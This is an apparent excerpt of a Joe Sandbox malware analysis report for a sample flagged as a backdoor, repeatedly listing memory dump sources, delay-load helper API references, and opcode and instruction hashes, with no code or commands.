                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 565a5a36cf9b58ecb821a24fe82998c18db8e64e0b278d43f1562e943d42489b
                                                • Instruction ID: 31a42c9acd6b6e866a4d7ade8b26ab3e7b2a3258e096f71f6932c61b90c50aa7
                                                • Opcode Fuzzy Hash: 565a5a36cf9b58ecb821a24fe82998c18db8e64e0b278d43f1562e943d42489b
                                                • Instruction Fuzzy Hash: 98B012B126E142EC3198A14A7D16D3A021CD4C8B10330411AB51DD02C0D4887D480431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 14fc4c439e35cf74bdd790fb5854e697db74cc595b5c2c8b8633b5188423746b
                                                • Instruction ID: a567161a23e47b4916cd38c76f3ca28516986ce301c9475f379d5127e6cc51be
                                                • Opcode Fuzzy Hash: 14fc4c439e35cf74bdd790fb5854e697db74cc595b5c2c8b8633b5188423746b
                                                • Instruction Fuzzy Hash: 89B012B126E042EC3158A14A6D16D3A021CD4C9B10330801AB91DD02C0D4487D080431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 5a20b74cd04021234c740cee2d8342c7fa9417b9ba31c8b0df7d8550e1828356
                                                • Instruction ID: 60d181b92bf32e5bf85eea82f4cb93dbae2e214d1e5cf7bd1022425a726f26b6
                                                • Opcode Fuzzy Hash: 5a20b74cd04021234c740cee2d8342c7fa9417b9ba31c8b0df7d8550e1828356
                                                • Instruction Fuzzy Hash: 38B012A126E042AC315CA14F6E16D3A020CD4C8B10330801AB51DD03C0D4487D0E1431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 45c48ab06122dd4ea5c19f2797ed86125e4f66199fa46637282df8424b95b824
                                                • Instruction ID: 7f01aca3784e1ebd42c2de345ee28e2d3bb58f0db30c46d8bdb97ddbf0f8aef8
                                                • Opcode Fuzzy Hash: 45c48ab06122dd4ea5c19f2797ed86125e4f66199fa46637282df8424b95b824
                                                • Instruction Fuzzy Hash: 57B012A126E182AC3198A14E7D16D3A020CD4C8B10330811AB51DD03C0D4887C8D0431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: c43fbfdffea026cded5410dd679681ca4272d27a72f34be7afc09e1bae66dae3
                                                • Instruction ID: ea7dcfbf9c8e3dbb2442939bf8c8bfe3f9f2207b065b92c55d983b08fcc41104
                                                • Opcode Fuzzy Hash: c43fbfdffea026cded5410dd679681ca4272d27a72f34be7afc09e1bae66dae3
                                                • Instruction Fuzzy Hash: A0B012A126E042AC3158A14E6D16D3A020CD4C9B10330C01AB91DD03C0D4487C0D0431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: b43706f93d45a16879bbda20c947d6f34660dde772338d02251c4910da5055f1
                                                • Instruction ID: e0af370dafba37564f9d32888119d743a02590ad312255f6d9e390e3136ee9d6
                                                • Opcode Fuzzy Hash: b43706f93d45a16879bbda20c947d6f34660dde772338d02251c4910da5055f1
                                                • Instruction Fuzzy Hash: E2B012A526E142AC3158A14A6D56D3F020CF4C8B10330401AB91DD02C0D54C7C080531
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 8a7fa03ea068bb0a36f93eca5b6a4da680301afbe13e4f71ae051c855c219784
• Instruction ID: f31994ed3003994241a55e001a7b07c9de78ec4dc3e9a87d65125a036a1c7d75
• Opcode Fuzzy Hash: 8a7fa03ea068bb0a36f93eca5b6a4da680301afbe13e4f71ae051c855c219784
• Instruction Fuzzy Hash: FCB012A526E342BC315861467D66C3F020CD4C4B10330452AB91DE01C0D48C7C4C4431
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
Memory Dump Source
• Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: e7bd5dcefa8b16f7ba985e2a07edffe91d28cc1af11648570aea72535fa2eeb6
• Instruction ID: 31095b7463895bd26efa6e167c6eed8100f5a96d7ced8c569644e3e7a1b3aa86
• Opcode Fuzzy Hash: e7bd5dcefa8b16f7ba985e2a07edffe91d28cc1af11648570aea72535fa2eeb6
• Instruction Fuzzy Hash: 05B012B126E142AC315CA14A6E16D3A028CD4C8B10730401AB51DD02C0E5487D091431
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
Memory Dump Source
• Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: f20e4a4d018773c50902afa0ce90466219e194515fded163a2c2a556bcc9102a
• Instruction ID: b1c46516e2d2372e65086bb92e77e5adaab5eb5762b361ca43405cd6dfccceeb
• Opcode Fuzzy Hash: f20e4a4d018773c50902afa0ce90466219e194515fded163a2c2a556bcc9102a
• Instruction Fuzzy Hash: 4AB012A126E142AC3158A15A6D16D3A024CD4C9B10330801ABA1DD02C0E5487C080431
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
Memory Dump Source
• Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: c9a9da823dd68e306b38da8cb0d29e9241592ba1ee2d7b2de7bd9c351d4de2c9
• Instruction ID: e249948f4088c8ec1057ce6addedcb798d08a3510543c7d89b54d997c9293de6
• Opcode Fuzzy Hash: c9a9da823dd68e306b38da8cb0d29e9241592ba1ee2d7b2de7bd9c351d4de2c9
• Instruction Fuzzy Hash: 34B012A127F042AC3158A14A6D16D3A024EE8C8B10730401AB65DD02C0D448BC080431
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
Memory Dump Source
• Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: d4e78ba3cf5721074210859ca4d0722de0d99e75be20a7a6b2c20ad180c93474
• Instruction ID: 342e5dd5e7b7e9492f43cdca71472f307ededdbe2869fef7d9aa1cc8566a5dcb
• Opcode Fuzzy Hash: d4e78ba3cf5721074210859ca4d0722de0d99e75be20a7a6b2c20ad180c93474
• Instruction Fuzzy Hash: C9B012B126F142AC3198A24A7D16D3A020ED4C8B10730411AB61DD02C0D488BC480431
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
Memory Dump Source
• Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 46b1da2371aba0f4408797ab281e209c563af11f0f327878d4adba442d8afd87
• Instruction ID: 8b1dc7213e95aea38f5ac37943e33b5fe9372afa9d8f98e20e8a6a0a343e27bc
• Opcode Fuzzy Hash: 46b1da2371aba0f4408797ab281e209c563af11f0f327878d4adba442d8afd87
• Instruction Fuzzy Hash: 12B012A136F042AC3158A14A6D16D3A020ED4C9B10730801ABA1DD02C0D448BC080431
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
Memory Dump Source
• Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: bb085084b6d58ed3f3bc8d68642782318ebec91eb3c64c739a8df62c034f1f04
• Instruction ID: bdf586f66e9991cd4b2343a32e9a1668b9d199dbe07fbffd6e74f1a216f1d1a5
• Opcode Fuzzy Hash: bb085084b6d58ed3f3bc8d68642782318ebec91eb3c64c739a8df62c034f1f04
• Instruction Fuzzy Hash: B6B012A126E041AC315CB14B6D16E3E024CE0CCB10330C52BF529C0284D44C4D0D4471
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
Memory Dump Source
• Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: ae32b700ef0c405b743935d2189831269698ec9dd46fc911ed20697389c1bacc
• Instruction ID: 6d38bcbb9882cd10dba247c2aafd01df9e790f85f769606b24b3141af6fa79ac
• Opcode Fuzzy Hash: ae32b700ef0c405b743935d2189831269698ec9dd46fc911ed20697389c1bacc
• Instruction Fuzzy Hash: E1B012B126E041EC315CB1476C16D3A024CD0C8B10330C12BF829C0284D44C4E0C4871
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
Memory Dump Source
• Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 1562eb87298add10838f2d6cec7d9a12aade925ea8e35ee9fa6540eb5167fa59
• Instruction ID: c890c64032f13f502f52f2186748e7ca8082c705d45120966238c568bf4a73d4
• Opcode Fuzzy Hash: 1562eb87298add10838f2d6cec7d9a12aade925ea8e35ee9fa6540eb5167fa59
• Instruction Fuzzy Hash: 91B012A12AE141AC715CF1476D16E3A024CF0C8B10330812BF429C0284D54C4D0C4571
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
Memory Dump Source
